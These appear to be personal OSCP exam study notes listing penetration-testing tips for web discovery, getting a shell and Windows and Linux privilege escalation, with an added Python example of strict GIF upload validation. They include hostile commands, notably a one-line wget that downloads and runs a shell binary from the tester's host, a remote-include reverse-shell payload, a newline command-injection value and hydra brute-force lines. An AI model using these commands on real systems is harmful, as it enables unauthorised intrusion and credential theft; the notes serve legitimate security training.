# OSCP - Things to Try When Stuck

### Initial Access

#### Web discovery

* If a directory or application you expect to exist isn't showing up, try the target's hostname as a path: `http://site/[hostname]`.
* Try both GET and POST for every URL; a server may only accept data through one HTTP method.
* Fuzz parameters with ffuf.
* Examine response headers for minor custom errors.

#### Getting a shell

* To save time, upload a web shell instead of manually executing PHP commands.
* Some PHP local file inclusion vulnerabilities can reference remote resources with `?path=http://[kali ip]/rev-shell.php`.
* Break up an exploit. Use Wireshark to watch for ICMP pings back home instead of going for a reverse shell right away.
* Instead of sharing a full rev shell payload, download an elf, +x, and execute it all in 1 command: `wget -P /tmp http://kali/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf`
* If a CMS has an RCE, look closely at what/where it's implemented. If a proof-of-concept URL contains /skins/, check for that functionality in the admin panel or in the online documentation.
* When calling back on a port (web request, shell, etc.) try multiple ports if the first fails.
* Piece together multiple initial access exploits. If one creates a web account and tries for a shell and fails, add `exit(0)` in the python script after the account is created and use the credentials for another exploit.
* Use the same ports the box has open for shell callbacks.
* Try at least 4 ports and ping when trying to get a callback.
* If you can control data that the server reads, always consider deserialization.
* Always test payloads locally, especially if the vulnerability is blind.
* Consider where you can write data that is later read back by the server.

#### General

* Don't spin wheels on other routes if something has a known exploit to root and it's a 10 pointer.
* Check version numbers to ensure something isn't a false flag.
* Consider similar protocols. If you get an SSH key, try using it over SCP.
* Type version numbers carefully!
* For hydra, always use `-e nsr`. Example: `hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 ftp -vV -f -e nsr -I`
* Look for `auth-owners` in nmap to get usernames.
* FTP: before downloading files, make sure your working directory on Kali is writable.
* For FTP, brute force the "admin" user.
* Search Metasploit modules for ideas <https://github.com/rapid7/metasploit-framework>.
* Search a software's Github page for version files that would give specific information.
* See Proving Grounds' Dibble for node.js RCE.
* Review page source code for commented out areas for every page.
* Guess parameters. If there's a POST to forgot\_pass.php with an email param, try `GET /forgot_pass.php?email=%0aid`.
* Parameter/command injection fuzzing:
  * Payload list: [github.com/payloadbox/command-injection-payload-list](https://github.com/payloadbox/command-injection-payload-list)
  * `ffuf -w cmd-wordlist.txt -u 192.168.1.1/under_construction/forgot.php?email=abcdFUZZde`
  * See Proving Grounds' Hetemit for an example.
* When brute forcing credentials, guess the software name as the username and password.
* When dealing with file type uploads, try specifying just the header, e.g. `GIF89a;`. Files pulled from Google Images may have been modified and may not be identified as a GIF.
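As an added illustration (not part of the original notes) of why the bare `GIF89a;` header trick works: a naive upload filter only compares the magic bytes, whereas a stricter validator parses the logical screen descriptor, the colour table, the first block and the trailer. The two sample files below are constructed for this example.

```python
import struct

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")


def naive_is_gif(data: bytes) -> bool:
    """What many upload filters do: accept anything that starts with the GIF magic."""
    return data[:6] in GIF_SIGNATURES


def strict_is_gif(data: bytes) -> bool:
    """Validate the 13-byte header, skip the global colour table, require a
    real block after it, and require the GIF trailer as the final byte."""
    if len(data) < 14 or data[:6] not in GIF_SIGNATURES:
        return False
    width, height, packed = struct.unpack_from("<HHB", data, 6)
    if width == 0 or height == 0:
        return False
    pos = 13
    if packed & 0x80:                     # global colour table flag set
        pos += 3 * (2 << (packed & 0x07))  # 3 bytes per entry, 2^(N+1) entries
    if pos >= len(data):
        return False
    if data[pos] not in (0x21, 0x2C):     # extension or image descriptor
        return False
    return data[-1] == 0x3B               # GIF trailer


# Constructed sample: the header-only file from the tip above, followed by script text.
FAKE_GIF = b"GIF89a;<?php echo 'x'; ?>"

# Constructed sample: a minimal valid 1x1 GIF (header, 2-colour table, image, trailer).
REAL_GIF = (
    b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
    + b"\x00\x00\x00\xff\xff\xff"                       # two-entry global colour table
    + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)    # image descriptor at (0,0), 1x1
    + b"\x02\x02\x44\x01\x00"                           # LZW min code size 2, one sub-block, terminator
    + b"\x3b"                                           # trailer
)


def compare(data: bytes) -> tuple:
    """Return (naive verdict, strict verdict) so the gap between the two is visible."""
    return naive_is_gif(data), strict_is_gif(data)


if __name__ == "__main__":
    print("header-only file:", compare(FAKE_GIF))   # (True, False)
    print("real 1x1 GIF:    ", compare(REAL_GIF))   # (True, True)
```

Structural checks only raise the bar; an upload handler that re-encodes images and serves them from a non-executing location is what actually removes the risk.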

### Windows Privilege Escalation

* Explore the root of the C:\ drive. Scheduled tasks that a low-privileged user can't list may still have their scripts located at C:\\.
* Always test a reverse shell on a windows box when attempting to get a shell.
* Explore alternatives to a reverse shell. Leverage exposed remote access protocols. For example, if a reverse shell doesn't work, execute a command to change the Administrator password and use smbexec to authenticate.
* Identify all users. Attempt to brute force authentication via RDP.
* Always view "C:\program files" and "C:\program files (x86)" for installed apps.

### Linux Privilege Escalation

* Privesc scripts aren't always right:
  * e.g. a decoy item exists in crontab while `sudo -l` reveals a process dumper that can be used to get credentials from memory.
* If a process dumper is available, don't Google too deep. See if there are custom "password" processes to target.
* `su root` is the best way to switch to root if you have a password but aren't in root group.
* Identify all users. Attempt to brute force SSH authentication if you can read `/home` or `/etc/passwd`.
* Always run `echo $PATH` to show available commands/locations.
* Docker - see Proving Grounds' Sirol/Escape box.
* If a user is in a group, it's probably for a reason.
* Fully understand software that's related to a user's group (e.g. fail2ban group).
* Use [pspy](https://github.com/DominicBreuker/pspy) to spy on processes and cronjobs you may not be able to see.
* Run `groups`.
* `cat ~/.profile && cat ~/.bashrc`.
* If running as www-data, always inspect the contents of html or the application, look for commented out passwords.
* If another user exists, always try `su [user]` with no password and with their username as the password.
* Check `/var/backups`.
* Custom SUID binaries won't be highlighted, as linpeas and other privesc scripts don't know what they are.
  * Examine each and every SUID!
* Run [linux-smart-enumeration/lse.sh](https://github.com/diego-treitos/linux-smart-enumeration) as a backup privilege escalation script.
* Files with caps / capabilities - see Proving Grounds' Escape box.


